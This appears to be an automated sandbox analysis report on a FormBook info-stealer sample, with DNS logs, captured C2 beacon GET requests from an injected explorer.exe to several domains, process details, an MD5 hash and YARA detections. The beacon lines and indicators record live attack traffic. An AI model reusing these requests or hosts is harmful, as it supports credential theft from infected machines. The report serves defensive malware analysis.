Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.85.93.188	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		23.20.208.181	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:29.824935913 CEST	8.8.8.8	192.168.2.6	0xbd4d	Name error (3)	www.pastlinks.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:34.940052032 CEST	8.8.8.8	192.168.2.6	0x7e02	No error (0)	www.chinatowndeliver.com	chinatowndeliver.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:34.940052032 CEST	8.8.8.8	192.168.2.6	0x7e02	No error (0)	chinatowndeliver.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bellaalubo.com

www.behiscalm.com

www.productprinting.online

www.corlora.com

www.jspagnier-graveur.com

www.chinatowndeliver.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49802	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:46.555294991 CEST	6323	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1 Host: www.bellaalubo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:46.624685049 CEST	6325	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 29 Sep 2021 02:39:46 GMT Content-Length: 0 Connection: close location: https://www.bellaalubo.com/mjyv?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6%2F3F+1gpc5iCodVhQ8Dw%3D%3D strict-transport-security: max-age=120 x-wix-request-id: 1632883186.572207666983115271 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgNejB6IPiH951PfWDw1jqb,qquldgcFrj2n046g4RNSVKSF4mMIGztppd+i2ecXTRlYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRaljekZC98cC4SZu7KJhEf4dWXfNlf1mX2p3mzZLvRoiy83fKEXQvQlSAkB/lstal9RyJsvviwg8ecWWqIsur7ZjM=,2UNV7KOq4oGjA5+PKsX47DNXPpcHBYLh9Govhfd9I4xYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,l7Ey5khejq81S7sxGe5Nk/MzqevR6djLa1zEmOJAB8iTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv0jDpKP1Mdvk8URFUJD8JTxFdGu3cQmuVVgGLeHJWl2bH2yWikl2EP5bJKtoyukhjw== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49811	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:51.694509983 CEST	6343	OUT	GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.behiscalm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:51.905149937 CEST	6344	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 29 Sep 2021 02:39:51 GMT Content-Type: text/html Content-Length: 275 ETag: "61525017-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49812	108.179.246.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:58.329883099 CEST	6344	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1 Host: www.productprinting.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:59.913381100 CEST	6345	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 29 Sep 2021 02:39:58 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49817	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:19.314099073 CEST	6368	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1 Host: www.corlora.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:40:19.359273911 CEST	6369	IN	HTTP/1.1 403 Forbidden Date: Wed, 29 Sep 2021 02:40:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 187 X-Sorting-Hat-ShopId: 59822768316 X-Dc: gcp-europe-west1 X-Request-ID: b2072cc8-88a9-4a8a-bbe3-16e62dc28b18 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 6961d898cb974357-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
Sep 29, 2021 04:40:19.359308958 CEST	6371	IN	Data Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
Sep 29, 2021 04:40:19.359329939 CEST	6372	IN	Data Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
Sep 29, 2021 04:40:19.359353065 CEST	6374	IN	Data Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 Data Ascii: ", "content-title": " " }, "ja": { "title": "
Sep 29, 2021 04:40:19.359370947 CEST	6374	IN	Data Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
Sep 29, 2021 04:40:19.359388113 CEST	6374	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49818	54.85.93.188	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:24.634798050 CEST	6375	OUT	GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.jspagnier-graveur.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:40:24.774866104 CEST	6376	IN	HTTP/1.1 200 OK Date: Wed, 29 Sep 2021 02:40:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 34 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20 Data Ascii: 14cb<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden
Sep 29, 2021 04:40:24.774931908 CEST	6378	IN	Data Raw: 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 Data Ascii: } #logo { background: url(https://www.namebrightstatic.com/images/logo_off.gif) no-repeat; width: 225px; height: 57px; margin-left: 29px; float: left;
Sep 29, 2021 04:40:24.774966955 CEST	6379	IN	Data Raw: 61 6c 20 31 36 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 Data Ascii: al 16px Arial, Helvetica, sans-serif !important; color: #fff; } .siteMaintenance p a { color: #FFF; } </style></head><body> <div class="sk
Sep 29, 2021 04:40:24.775007963 CEST	6380	IN	Data Raw: 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 4d 61 69 6e 74 65 6e 61 6e 63 65 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d Data Ascii: d"> <div class="siteMaintenance" style="font-family:Tahoma"> <h1>jspagnier-graveur.com<br /> is coming soon</h1> </div>
Sep 29, 2021 04:40:24.775029898 CEST	6381	IN	Data Raw: 63 6f 75 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 45 6e 64 20 6f 66 20 53 74 61 74 43 6f 75 6e 74 65 72 20 43 6f 64 65 20 66 6f 72 Data Ascii: counter"> </a> </div></noscript>... End of StatCounter Code for Default Guide --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49819	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:34.965442896 CEST	6382	OUT	GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.chinatowndeliver.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:40:35.112025976 CEST	6382	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 29 Sep 2021 02:40:35 GMT Content-Type: text/html Content-Length: 275 ETag: "61525011-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: UaTmOE6yP9.exe PID: 6468 Parent PID: 5772

General

Start time:	04:38:26
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Imagebase:	0x8e0000
File size:	1048576 bytes
MD5 hash:	4C70D5B1C63A468F7E0AEDF64F93CA42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: UaTmOE6yP9.exe PID: 6624 Parent PID: 6468

General

Start time:	04:38:28
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Imagebase:	0x8e0000
File size:	1048576 bytes
MD5 hash:	4C70D5B1C63A468F7E0AEDF64F93CA42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 6624

General

Start time:	04:38:31
Start date:	29/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
